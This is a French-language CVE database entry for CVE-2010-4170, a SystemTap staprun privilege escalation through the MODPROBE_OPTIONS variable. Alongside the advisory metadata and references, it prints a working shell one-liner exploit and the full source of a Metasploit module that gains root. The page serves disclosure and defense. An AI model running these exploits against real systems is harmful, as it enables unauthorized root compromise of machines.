CVE-2010-4170 : Détail

CVE-2010-4170

A01-Broken Access Control
24.08%V4
Local
2010-12-07
20h00 +00:00
2019-04-19
13h06 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 15620

Date de publication : 2010-11-25 23h00 +00:00
Auteur : Tavis Ormandy
EDB Vérifié : Yes

CVE-2010-4170 printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html
Exploit Database EDB-ID : 46730

Date de publication : 2019-04-18 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges by exploiting a vulnerability in the `staprun` executable included with SystemTap version 1.3. The `staprun` executable does not clear environment variables prior to executing `modprobe`, allowing an arbitrary configuration file to be specified in the `MODPROBE_OPTIONS` environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2010-11-17', 'References' => [ ['BID', '44914'], ['CVE', '2010-4170'], ['EDB', '15620'], ['URL', 'https://securitytracker.com/id?1024754'], ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'], ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'], ['URL', 'https://bugs.launchpad.net/bugs/677226'], ['URL', 'https://www.debian.org/security/2011/dsa-2348'] ], 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0)) register_options [ OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def staprun_path datastore['STAPRUN_PATH'] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def check # On some systems, staprun execution is restricted to stapusr group: # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true' vprint_error "#{staprun_path} is not executable" return CheckCode::Safe end vprint_good "#{staprun_path} is executable" unless setuid? staprun_path vprint_error "#{staprun_path} is not setuid" return CheckCode::Safe end vprint_good "#{staprun_path} is setuid" CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 10..15}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe config_path = "#{base_dir}/#{payload_name}.conf" upload config_path, "install uprobes /bin/sh" print_status 'Executing payload...' res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}" vprint_line res end end

Products Mentioned

Configuraton 0

Systemtap>>Systemtap >> Version 1.3

Références

http://www.exploit-db.com/exploits/15620
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/42263
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0894.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2010-0895.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/42306
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/44914
Tags : vdb-entry, x_refsource_BID
http://www.debian.org/security/2011/dsa-2348
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securitytracker.com/id?1024754
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/46920
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42256
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42318
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/46730/
Tags : exploit, x_refsource_EXPLOIT-DB
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.